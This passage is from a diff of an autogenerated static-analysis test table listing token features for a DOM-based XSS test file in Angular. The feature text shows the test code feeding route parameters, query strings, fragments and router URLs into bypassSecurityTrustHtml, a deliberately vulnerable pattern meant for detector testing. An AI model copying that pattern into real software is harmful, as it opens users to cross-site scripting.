autogenerated/Xss/DomBasedXss/angular2-client.ts:29:5:29:8 | this | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:5:29:8 | this | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:5:29:8 | this | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:5:29:8 | this | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:5:29:14 | this.route | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:5:29:14 | this.route | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:5:29:14 | this.route | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:5:29:14 | this.route | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:5:29:14 | this.route | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:5:29:23 | this.route.paramMap | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:5:29:23 | this.route.paramMap | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:5:29:23 | this.route.paramMap | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:5:29:23 | this.route.paramMap | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:5:29:23 | this.route.paramMap | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:5:29:33 | this.ro ... bscribe | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:5:29:33 | this.ro ... bscribe | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:5:29:33 | this.ro ... bscribe | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:5:29:33 | this.ro ... bscribe | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:5:29:33 | this.ro ... bscribe | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:5:31:6 | exceptional return of this.ro ... \\n }) | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:5:31:6 | exceptional return of this.ro ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:5:31:6 | exceptional return of this.ro ... \\n }) | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:5:31:6 | exceptional return of this.ro ... \\n }) | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:5:31:6 | exceptional return of this.ro ... \\n }) | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:5:31:6 | this.ro ... \\n }) | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:5:31:6 | this.ro ... \\n }) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:5:31:6 | this.ro ... \\n }) | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:5:31:6 | this.ro ... \\n }) | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:5:31:6 | this.ro ... \\n }) | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:10:29:14 | route | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:10:29:14 | route | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:10:29:14 | route | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:10:29:14 | route | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:10:29:14 | route | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:16:29:23 | paramMap | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:16:29:23 | paramMap | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:16:29:23 | paramMap | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:16:29:23 | paramMap | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:16:29:23 | paramMap | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:25:29:33 | subscribe | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:25:29:33 | subscribe | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:25:29:33 | subscribe | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:25:29:33 | subscribe | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:25:29:33 | subscribe | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:35:29:37 | map | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:35:29:37 | map | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:35:29:37 | map | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:35:29:37 | map | contextSurroundingFunctionParameters | ()\n(map) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:35:29:37 | map | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:35:29:37 | map | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:35:29:37 | map | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:35:29:37 | map | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:35:29:37 | map | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:35:29:37 | map | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:35:31:5 | 'arguments' object of anonymous function | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:35:31:5 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:35:31:5 | 'arguments' object of anonymous function | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:35:31:5 | 'arguments' object of anonymous function | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:35:31:5 | 'arguments' object of anonymous function | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:35:31:5 | exceptional return of anonymous function | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:35:31:5 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:35:31:5 | exceptional return of anonymous function | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:35:31:5 | exceptional return of anonymous function | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:35:31:5 | exceptional return of anonymous function | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | | autogenerated/Xss/DomBasedXss/angular2-client.ts:29:35:31:5 | map => ... K\\n } | CalleeFlexibleAccessPath | this.route.paramMap.subscribe | | autogenerated/Xss/DomBasedXss/angular2-client.ts:29:35:31:5 | map => ... K\\n } | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/angular2-client.ts:29:35:31:5 | map => ... K\\n } | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | @@ -12005,6 +91248,61 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/angular2-client.ts:29:35:31:5 | map => ... K\\n } | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | | autogenerated/Xss/DomBasedXss/angular2-client.ts:29:35:31:5 | map => ... K\\n } | enclosingFunctionName | ngOnInit | | autogenerated/Xss/DomBasedXss/angular2-client.ts:29:35:31:5 | map => ... K\\n } | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:35:31:5 | return of anonymous function | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:35:31:5 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:35:31:5 | return of anonymous function | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:35:31:5 | return of anonymous function | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:35:31:5 | return of anonymous function | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:7:30:10 | this | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:7:30:10 | this | contextSurroundingFunctionParameters | ()\n(map) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:7:30:10 | this | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:7:30:10 | this | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:7:30:10 | this | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:7:30:20 | this.sanitizer | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:7:30:20 | this.sanitizer | contextSurroundingFunctionParameters | ()\n(map) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:7:30:20 | this.sanitizer | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:7:30:20 | this.sanitizer | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:7:30:20 | this.sanitizer | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:7:30:44 | this.sa ... ustHtml | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:7:30:44 | this.sa ... ustHtml | contextSurroundingFunctionParameters | ()\n(map) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:7:30:44 | this.sa ... ustHtml | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:7:30:44 | this.sa ... ustHtml | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:7:30:44 | this.sa ... ustHtml | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:7:30:60 | exceptional return of this.sa ... 'foo')) | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:7:30:60 | exceptional return of this.sa ... 'foo')) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:7:30:60 | exceptional return of this.sa ... 'foo')) | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:7:30:60 | exceptional return of this.sa ... 'foo')) | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:7:30:60 | exceptional return of this.sa ... 'foo')) | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:7:30:60 | this.sa ... 'foo')) | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:7:30:60 | this.sa ... 'foo')) | contextSurroundingFunctionParameters | ()\n(map) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:7:30:60 | this.sa ... 'foo')) | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:30:7:30:60 | this.sa 